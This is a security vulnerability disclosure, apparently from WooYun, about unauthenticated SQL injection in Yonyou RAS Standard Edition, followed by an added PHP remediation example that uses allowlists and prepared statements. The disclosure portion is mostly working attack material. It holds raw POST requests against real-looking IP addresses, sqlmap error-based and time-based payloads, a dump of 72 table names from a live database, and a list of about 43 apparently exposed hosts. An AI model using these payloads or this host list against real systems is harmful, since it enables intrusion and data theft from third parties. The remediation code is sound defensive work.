2015-06-03: Details reported to the vendor, awaiting vendor handling
2015-06-08: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-08-02: Details disclosed to core white hats and experts in related fields
2015-08-12: Details disclosed to ordinary white hats
2015-08-22: Details disclosed to intern white hats
2015-09-06: Details disclosed to the public
Over 40 cases attached.
The Yonyou RAS Standard Edition client (Remote Application Access) has SQL injection reachable without login. First location:
POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Referer: http://116.236.131.194:8080/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 116.236.131.194:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: --user-agent "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0"
Accept: */*

AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1

Both the ViewAppFld and ViewAppValue parameters are injectable. Second location:
POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://218.31.33.44:8888/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 218.31.33.44:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1ViewAppValue=1

Both the ViewAppFld and ViewAppValue parameters are injectable.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ViewAppFld (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1
---
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
current database: 'rasdatabase'
Database: rasdatabase
[72 tables]
+---------------------------+
| hbadminrolegroupmembers   |
| hbadminrolerestrictedorgs |
| hbadminroletask           |
| hbadminroleusermembers    |
| hbclientgroupapplication  |
| hbclientgroupprinter      |
| hbdirectoryapplication    |
| hborgapplication          |
| hborglicensepolicy        |
| hborgpolicy               |
| hbpolicyvalues            |
| hbroletask                |
| hbserverapplication       |
| hbserverprinterdriver     |
| hbserverprintinf          |
| hbserverrole              |
| hbservertask              |
| hbtaskaction              |
| hbtaskcondition           |
| hbuserapplication         |
| hbuserdirectory           |
| hbuserorgs                |
| hbuserpolicy              |
| lograsarchi               |
| lograsconcurrenta         |
| lograsconcurrentus        |
| lograsent                 |
| lograssessi               |
| lograstaskactionhist      |
| lograstaskhist            |
| oemuserinfo               |
| rasactions                |
| rasadminroles             |
| rasadmintasks             |
| rasapplication            |
| rasbadprinterdriver       |
| rascfg                    |
| rasclient                 |
| rasclientgroup            |
| rascompatibilitydriver    |
| rasconcurrentsession      |
| rasconditions             |
| rasconnectionsetting      |
| rasdatabase               |
| rasdirectory              |
| rasdmzserverd             |
| rasdomain                 |
| rasgroupuser              |
| rasinfocollectordata      |
| rasjobs                   |
| rasjobsteps               |
| raslicenseinfo            |
| raslicensetoken           |
| raslicpolicy              |
| raslockdownpolicies       |
| rasmonthlyminute          |
| rasorgs                   |
| rasprinter                |
| rasprinterdriver          |
| rasproductk               |
| rasreqids                 |
| rasroles                  |
| rasrunningservers         |
| rasselection              |
| rasserver                 |
| rasstyle                  |
| rastasks                  |
| rasticketing              |
| rastimedsessio            |
| rasuser                   |
| rasusermng                |
| usermachines              |
+---------------------------+

http://116.236.131.194:8080/
http://221.239.106.90:81/
http://61.161.199.197/
http://180.168.5.162:8080/
http://111.30.26.38:8000/
http://115.231.212.82:8080/
http://58.246.235.50/
http://218.31.33.158:8001/
http://60.10.34.57:8888/
http://218.207.195.169:8888/
http://122.224.243.218:8888/
http://124.172.246.131:81/
http://120.35.19.21:81/
http://222.69.38.12:8080/
http://61.161.182.38:8080/
http://125.93.255.209:8000/
http://223.197.196.73:81/
http://58.221.244.10:8080/
http://112.84.176.254:8000/
http://61.164.84.70:8080/
http://116.228.5.26:8080/
http://218.76.48.74:81/
http://140.207.74.170:81/
http://121.29.222.68:8080/
http://59.53.170.89:81/
http://218.31.33.44:8888/
http://60.190.102.141:8080/
http://60.12.220.103:8000/
http://122.227.192.250:8080/
http://59.37.7.110:8001/
http://222.223.228.247:81/
http://222.69.91.134:81/
http://116.228.113.155/
http://121.33.210.52:8080/
http://116.90.82.78:8000/
http://221.129.245.61:8080/
http://120.71.225.49:8000/
http://110.87.98.18:81/
http://60.29.103.158:8000/
http://120.193.185.187:81/
http://58.20.34.149:8080/
http://222.223.228.249:81/
http://210.22.101.234:8080/
Filter the input.
Hazard level: No impact (vendor ignored)
Ignored on: 2015-09-06 16:59
Vulnerability rank: 15 (WooYun rating)
None yet
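The fix suggestion above is one word, so here is what "filter" has to mean for these two parameters in practice. This is an added example, not Yonyou's code: ViewAppFld selects which column is searched, so it cannot be a bound parameter and must instead be mapped through an allowlist, while ViewAppValue is plain data and is bound with a prepared statement. The table name rasapplication comes from the dumped table list; the column names, the field-index mapping and the use of an in-memory SQLite database for the offline run are assumptions.

```php
<?php
// Added example (not Yonyou's code): hardened handling of ViewAppFld / ViewAppValue.
// Column names and the index-to-column mapping are assumptions for illustration.
declare(strict_types=1);

// The client sends a numeric field index (ViewAppFld=8 in the report). Only the
// indices listed here are accepted, and only these column names ever reach SQL.
const SEARCHABLE_FIELDS = [
    1 => 'DisplayName',   // assumed mapping
    8 => 'Description',   // assumed mapping
];
const SORT_COLUMNS = ['DisplayName' => 'DisplayName', 'AppID' => 'AppID'];
const SORT_DIRECTIONS = ['A' => 'ASC', 'D' => 'DESC'];   // sortType=A seen in the report

function searchApplications(PDO $db, string $viewAppFld, string $viewAppValue,
                            string $sort = 'DisplayName', string $sortType = 'A'): array
{
    // Reject anything that is not a known field index before building any SQL.
    if (!ctype_digit($viewAppFld) || !array_key_exists((int)$viewAppFld, SEARCHABLE_FIELDS)) {
        throw new InvalidArgumentException('ViewAppFld is not a known field index');
    }
    $column = SEARCHABLE_FIELDS[(int)$viewAppFld];

    // sort / sortType are also spliced into the statement, so they get the same treatment.
    if (!isset(SORT_COLUMNS[$sort]) || !isset(SORT_DIRECTIONS[$sortType])) {
        throw new InvalidArgumentException('invalid sort parameters');
    }
    $orderBy = SORT_COLUMNS[$sort] . ' ' . SORT_DIRECTIONS[$sortType];

    // A length cap on the search value is cheap defence in depth; the value itself
    // is bound, never concatenated, so quotes and parentheses stay literal text.
    if (strlen($viewAppValue) > 64) {
        throw new InvalidArgumentException('ViewAppValue too long');
    }

    // $column and $orderBy come only from the allowlists above, so interpolating
    // them here does not reintroduce injection.
    $stmt = $db->prepare(
        "SELECT AppID, DisplayName FROM rasapplication WHERE $column = :value ORDER BY $orderBy"
    );
    $stmt->execute([':value' => $viewAppValue]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Offline demonstration on an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rasapplication (AppID INTEGER, DisplayName TEXT, Description TEXT)');
$db->exec("INSERT INTO rasapplication VALUES (651, 'Notepad', '1'), (652, 'Calc', '2')");

// Normal search: field 8 (Description) equal to '1' returns the Notepad row.
print_r(searchApplications($db, '8', '1'));

// A value containing SQL syntax is compared as a literal string and matches nothing.
print_r(searchApplications($db, '8', "1) AND (1=1"));

// A field index carrying SQL syntax is rejected before any statement is prepared.
try {
    searchApplications($db, '8) AND (1=1', '1');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The design point is the split between identifiers and data: MySQL prepared statements can bind values but not column names, so a parameter that chooses a column (ViewAppFld, sort) is only ever used as a key into a fixed array, while a parameter that carries a value (ViewAppValue) is passed to execute(). Escaping the value with a quoting function instead of binding would still leave the column-selecting parameters open, which is exactly where the error-based and time-based payloads in the sqlmap output land.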